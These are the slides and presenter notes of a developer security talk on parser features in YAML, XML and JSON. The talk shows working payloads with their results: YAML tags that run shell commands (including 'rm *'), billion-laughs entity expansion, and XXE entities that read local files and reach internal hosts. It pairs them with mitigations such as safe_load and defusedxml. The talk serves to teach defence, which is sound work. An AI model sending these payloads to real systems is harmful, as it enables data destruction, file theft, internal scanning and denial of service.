Serialization formats aren't toys

Tom Eastman tom@catalyst.net.nz @tveastman

Presenter Notes

Who am I?

Presenter Notes

I'm a Python developer. I'm not a security expert or a penetration tester.

But my drinking buddies all are, and so I have developed a healthily paranoid worldview, because I don't like it when they break my toys.

Who are you?

Presenter Notes

If you are an IT security professional, you already know all this stuff.

If you're a developer, it's about being aware that this is even a thing.

I'm nervous about talking in front of a crowd about things that some might think are 'remedial'.

But the problem is, the same mistakes keep getting made, and so clearly some people still need to be told. Spread the word!

Why am I talking about this?

Presenter Notes

I was working on a project where I ever-so-conscientiously mitigated all of the OWASP Top 10. I did a decent enough job of it, but I was unable to protect myself from what I didn't know about.

And then, after a talk from Mike Haworth of Aura, I realized I had more than those 10 to worry about. I went back to work and DoS'd my app in 2 minutes.

As do we all, because an attacker only has to know one thing you don't to screw you over.

90% of magic merely consists of knowing one extra fact.

Presenter Notes

It's a Terry Pratchett quote, but it's pretty appropriate when it comes to breaking apps.

The smart hackers know about all the bugs in all the software.

The REALLY smart hackers know about all the features in all the software.

It's not a bug, it's a feature.

Presenter Notes

Everything I'm talking about today is a feature, not a bug.

These are all things that someone thought were a great idea.

Serialization Formats

Presenter Notes

Or markup languages or whatever you want to call them.

I just mean formats that structure data we take in so it doesn't suck to get information out of them.

XML, YAML, and JSON in this talk, but there are a billion of them, in all kinds of languages and uses.

All of them have little surprises tucked away. ALL of them are too smart for their own good sometimes.

PaaS (Parsing as a Service)

import bottle

@bottle.post('/yaml')
def yaml():
    ## PyYAML -- the de facto standard parser.
    import yaml
    return str(yaml.load(bottle.request.body)) + '\n'

@bottle.post('/lxml')
def lxml():
    ## The most popular Python XML library (libxml2 based)
    from lxml import etree
    tree = etree.parse(bottle.request.body)
    return tree.getroot().text

@bottle.post('/xml')
def xml():
    ## Python's standard library XML parser
    from xml.etree import ElementTree
    tree = ElementTree.parse(bottle.request.body)
    return tree.getroot().text

if __name__ == '__main__':
    bottle.run(host='localhost', port=8080, debug=True)

Presenter Notes

This is my little example I used for preparing this talk.

A tiny web service that is simply parsing the markup and then returning what was parsed. Just for my examples in this talk.

Each endpoint is the bare minimum code to get from zero-to-parsing. No option setting. Import library; use library.

This is what someone who needs a parser in a hurry WILL do.

YAML

Presenter Notes

Let's start with YAML because it's been in the news lately.

YAML's been around since 2001ish and is very popular in languages like Ruby and Python.

It pretends to be a human readable serialization format.

Parsing YAML

POST /yaml

first_name: Tom
last_name: Eastman
email_address: tom@catalyst.net.nz

RESPONSE

{'email_address': 'tom@catalyst.net.nz',
 'first_name': 'Tom',
 'last_name': 'Eastman'}

Presenter Notes

I've got a bunch of slides like this. At the top is the raw input to my little web service, in this case a simple snippet of YAML.

Below that I have the parsed output, which is a Python dictionary object.

Parsing YAML

POST /yaml

'first_name': Tom
'last_name': Eastman
'email_address': tom@catalyst.net.nz
'birthday': !!python/object/apply:datetime.date [1980, 1, 1]

RESPONSE

{'email_address': 'tom@catalyst.net.nz',
 'first_name': 'Tom',
 'last_name': 'Eastman',
 'birthday': datetime.date(1980, 1, 1)}

Presenter Notes

Here we're doing something much more clever -- we're creating an instance of a Python date class.

The YAML parser finds the datetime module and instantiates a 'date' using the arguments provided.
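
As a rough mental model only (this is not PyYAML's actual implementation), the object/apply tag amounts to "import the named module, look up the named callable, call it with the listed arguments". The helper name `apply_tag` is invented for this illustration:

```python
import importlib


def apply_tag(dotted_name, args):
    """Hypothetical stand-in for what an object/apply tag asks the parser to do."""
    # Split "datetime.date" into module "datetime" and attribute "date".
    module_name, _, attribute = dotted_name.rpartition(".")
    # The module is imported on demand, whether or not the app ever used it.
    module = importlib.import_module(module_name)
    # Call whatever was named, with arguments taken straight from the document.
    return getattr(module, attribute)(*args)


birthday = apply_tag("datetime.date", [1980, 1, 1])
print(repr(birthday))
```

Nothing in that model limits the dotted name to harmless classes like datetime.date.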

Did a shiver go down anyone's spine?

... hmm, what else can we do ...

Presenter Notes

Parsing YAML

POST /yaml

'first_name': Tom
'last_name': Eastman
'email_address': tom@catalyst.net.nz
'contents_of_cwd': !!python/object/apply:subprocess.check_output ['ls']

RESPONSE

{'email_address': 'tom@catalyst.net.nz',
 'first_name': 'Tom',
 'last_name': 'Eastman',
 'contents_of_cwd': 'badservice.py\nbadservice.py~\nbob.yaml\nbob.yaml~\nthousandlaughs.xml\nxxe_1.xml\n'}

Presenter Notes

Well, this can't be good.

I can use the exact same mechanism to 'instantiate' the Python standard library function for shelling out to the system.

hey... I wonder if...

Presenter Notes

Famous last words?

Parsing YAML

POST /yaml

'first_name': Tom
'last_name': Eastman
'email_address': tom@catalyst.net.nz
'goodbye': !!python/object/apply:os.system ['rm *']
'contents_of_cwd': !!python/object/apply:subprocess.check_output ['ls']

RESPONSE

{'first_name': 'Tom',
 'email_address': 'tom@catalyst.net.nz',
 'last_name': 'Eastman',
 'goodbye': 0,
 'contents_of_cwd': '\n'}

Presenter Notes

C'mon, I had to try it, right?

And so yeah, I ended up re-writing my little web server after that call cleaned out the directory it was in.

Surely this doesn't happen in real life?

Presenter Notes

That's so blatantly bad that surely this wouldn't actually happen in real life, right?

November 2011

TastyPIE Bug Report

Presenter Notes

Two of the most popular REST framework libraries used with Django

January 2013

Rails bug report

Presenter Notes

Ruby on Rails, which you've probably heard of.

February 2013

Rails bug report again

Presenter Notes

June 2013

Puppet bug report

Presenter Notes

This is the one that made me want to write this talk.

Also in June 2013

Node.js bug report

Presenter Notes

How do I protect myself?

Presenter Notes

Make the parser stupider

Presenter Notes

Disable YAML tag parsing

Python

## ...instead of...
result = yaml.load(something)
## ...just use...
result = yaml.safe_load(something)
## easy-peasy!

Ruby

## https://github.com/dtao/safe_yaml
YAML.load(something, :safe => true)
## (blows my mind that you need an external gem...)
## (but I could be missing something)

Presenter Notes

By the way, I think you're actually a little bit SAFER in one way with Ruby.

Based on what I've read, the Ruby parser requires the class you're deserializing to be already loaded.

The Python one, on the other hand, will happily import the module for you.
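
A minimal sketch of the Python side of that fix, assuming PyYAML is installed. `yaml.safe_load` only builds plain data types (dicts, lists, strings, numbers and so on), so the Python-specific tag from the earlier slides is refused with an error instead of being acted on. The constant and variable names are made up for the example:

```python
import yaml

PLAIN = "first_name: Tom\nlast_name: Eastman\n"
TAGGED = "birthday: !!python/object/apply:datetime.date [1980, 1, 1]\n"

# Ordinary data parses just as it did with yaml.load().
plain_result = yaml.safe_load(PLAIN)

# The tagged document is rejected: safe_load has no constructor for python/* tags.
try:
    yaml.safe_load(TAGGED)
    tag_rejected = False
except yaml.YAMLError:
    tag_rejected = True

print(plain_result, tag_rejected)
```

The trade-off is deliberate: the parser gets stupider, and any document relying on those tags stops loading.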

XML

Presenter Notes

I was trying to think of something scary like "Fun with XML" or "Dangerous XML", but it speaks for itself.

Entities

POST /lxml

<?xml version="1.0" encoding="ISO-8859-1"?>
<foo>
  Yay! Smile!  &#9786;
</foo>

RESPONSE

Yay! Smile!  ☺

Presenter Notes

Defining entities

POST /lxml

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY smiley "&#9786;"  >]>
<foo>
   Yay! Smile!  &smiley;
</foo>

RESPONSE

Yay! Smile!  ☺

Presenter Notes

Recursive entity expansion

POST /xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY smiley "&#9786;"  >
  <!ENTITY s2 "&smiley;&smiley;&smiley;&smiley;&smiley;">
  <!ENTITY s3 "&s2;&s2;&s2;&s2;&s2;&s2;&s2;&s2;&s2;&s2;&#x000A;">
  <!ENTITY s4 "&s3;&s3;&s3;&s3;&s3;&s3;&s3;&s3;&s3;&s3;">]>
<foo>
   Yay! Smile! &s4;
</foo>

RESPONSE

 1 Yay! Smile! 
 2 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 3 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 4 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 5 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 6 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 7 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 8 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 9 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
10 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
11 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺

Presenter Notes
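
To watch the multiplication happen without hurting anything, here is a small sketch that feeds the same entity definitions to the standard library parser and counts what comes out. The payload is the one from the slide minus the XML declaration; the variable names are invented for the example:

```python
from xml.etree import ElementTree

PAYLOAD = """<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY smiley "&#9786;"  >
  <!ENTITY s2 "&smiley;&smiley;&smiley;&smiley;&smiley;">
  <!ENTITY s3 "&s2;&s2;&s2;&s2;&s2;&s2;&s2;&s2;&s2;&s2;&#x000A;">
  <!ENTITY s4 "&s3;&s3;&s3;&s3;&s3;&s3;&s3;&s3;&s3;&s3;">]>
<foo>
   Yay! Smile! &s4;
</foo>"""

root = ElementTree.fromstring(PAYLOAD)
# &#9786; is U+263A, the smiley character.
smileys = root.text.count("\u263a")
print(len(PAYLOAD), "characters in,", smileys, "smileys out")
```

Each nesting level multiplies the one before it: 5 x 10 x 10 = 500 smileys from a single entity reference in the body.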

The Billion Laughs Attack

POST /xml

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

RESPONSE

<smoking ruin>

Presenter Notes

Actually, this is only the 168 million laughs attack.

Funny story, my laptop exploded before I could even post this to my test server, because the text editor I was using tried to parse it.
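
The arithmetic behind that number, as a quick sketch. It assumes the parser expands every entity in full, and the constant names are invented for the example:

```python
# Entity definitions from the slide: "lol" is 3 characters, lol1 repeats it
# 10 times, and each of lol2..lol9 repeats the previous entity 8 times.
BASE_TEXT = "lol"
FIRST_LEVEL_REPEATS = 10
LATER_LEVEL_REPEATS = 8
LATER_LEVELS = 8  # lol2 through lol9

laughs = FIRST_LEVEL_REPEATS * LATER_LEVEL_REPEATS ** LATER_LEVELS
expanded_chars = laughs * len(BASE_TEXT)

print(f"{laughs:,} laughs, {expanded_chars:,} characters after expansion")
```

That works out to 167,772,160 laughs, or roughly 500 million characters of text, from a document of well under a kilobyte.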

... what else can we do ...

Presenter Notes

External entities

POST /lxml

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY smiley "&#9786;">
   <!ENTITY lsb_release SYSTEM "file:///etc/lsb-release">]>
<foo>
  Tell me more about yourself...

  &lsb_release;
</foo>

RESPONSE

Tell me more about yourself...

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.3 LTS"

Presenter Notes

ANY file the parser can read is fair game.

I'll bet the parser can read the app's configuration files.

Of course it can read its own source code.

External entities

POST /lxmlnet

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY a_file_on_the_local_intranet
     SYSTEM "http://192.168.76.82/hello">]>
<foo>
&a_file_on_the_local_intranet;
</foo>

RESPONSE

Hi!

I'm a file on Tom's laptop's webserver.

Isn't that nice?

Presenter Notes

Good news: the Python lxml library actually tried to stop this. It defaulted to not allowing me to expand network entities.

Hey look! An attacker can use the XML parser to port-scan the internal network. You could even connect to port 25, 110, etc.

Surely this doesn't happen in real life?

Presenter Notes

all. the. time.

Presenter Notes

Yeah sorry, I'm not going to do a slideshow for you.

I'm too scared I'll find out that this happens more often than it NOT happens.

It's an education problem: sometimes the same people who do this are leaving their parsers running as root.

How do I protect myself?

Presenter Notes

How do I protect myself?

  • Don't allow DTDs
  • Don't expand entities
  • Don't resolve externals
  • Limit parse depth
  • Limit total input size
  • Limit parse time
  • Favor a SAX or iterparse-like parser for potentially large data
  • Validate and properly quote arguments to XSL transformations and XPath queries
  • Don't use XPath expressions from untrusted sources
  • Don't apply XSL transformations that come from untrusted sources

https://www.isecpartners.com/media/12976/iSEC-HILL-Attacking-XML-Security-bh07.pdf
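
As a hedged illustration of the first and fifth bullets only, here is a standard-library sketch that refuses any document carrying a DTD and caps the input size before building a tree. `parse_untrusted`, `ForbiddenXML` and the `MAX_BYTES` value are names and numbers invented for this example; it does not cover the other bullets:

```python
from xml.etree import ElementTree
from xml.parsers import expat

MAX_BYTES = 1_000_000  # hypothetical limit; pick one that suits your data


class ForbiddenXML(ValueError):
    """Raised when a document uses a feature we refuse to process."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # Called by expat as soon as it sees "<!DOCTYPE", before any entity
    # defined inside the DTD can be expanded.
    raise ForbiddenXML("DTDs are not allowed")


def parse_untrusted(data: bytes):
    if len(data) > MAX_BYTES:
        raise ForbiddenXML("input too large")
    # First pass: a bare expat parser whose only job is to spot a DTD.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)
    # Second pass: the document has no DTD, so no custom entities to expand.
    return ElementTree.fromstring(data)
```

A plain document such as `parse_untrusted(b"<foo>hi</foo>")` comes back as an element, while anything starting with a DOCTYPE raises `ForbiddenXML`. Parsing twice is wasteful, but it keeps the sketch short.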

Presenter Notes

Oh, is that all? That's easy!

That's a lot of work. But it boils down to the same thing as before...

Make the parser stupider

Presenter Notes

Make the parser stupider

Python

  • defusedxml https://pypi.python.org/pypi/defusedxml

Other languages

  • Work out how to turn off the features you don't absolutely need.
  • If you need some of these features, maybe re-think your needs?

Presenter Notes

JSON: Finally stupid enough?

Presenter Notes

...only if you use a stupid enough parser!

Presenter Notes

eval() is not a stupid enough parser.

Presenter Notes

eval() is not a stupid enough parser.

W3Schools

Presenter Notes

eval() is not a stupid enough parser.

JSON.org

Presenter Notes

In fairness, both of these pages, further down, say that using eval 'might cause security concerns'.

Why don't they SAY THAT FIRST?!
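
Those pages are about JavaScript's eval(), but Python has the same trap, so here is the Python analogue as a sketch. The "hostile" input is a harmless expression chosen for illustration; a real attacker would not be so polite:

```python
import json

GENUINE = '{"first_name": "Tom", "last_name": "Eastman"}'
HOSTILE = '__import__("os").getcwd()'  # not JSON at all, just Python code

# eval() accepts both: it runs whatever expression it is handed.
eval_genuine = eval(GENUINE)
eval_hostile = eval(HOSTILE)  # the sender's code has now executed

# json.loads() only understands JSON, so the hostile input is an error.
json_genuine = json.loads(GENUINE)
try:
    json.loads(HOSTILE)
    hostile_rejected = False
except json.JSONDecodeError:
    hostile_rejected = True

print(eval_genuine == json_genuine, hostile_rejected)
```

Both approaches give the same dictionary for well-behaved input, which is exactly why the eval() shortcut looks fine until someone sends something else.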

The lesson

Presenter Notes

Beware of flexibility

Presenter Notes

If a tool sells itself as "Look what I can do!", look out!

Disable EVERYTHING

Presenter Notes

Features that surprise you are worse than bugs that surprise you.

No-one's really surprised by bugs, after all.

K.I.S.S.

Presenter Notes

Thanks for your time!

Tom Eastman tom@catalyst.net.nz @tveastman

Presenter Notes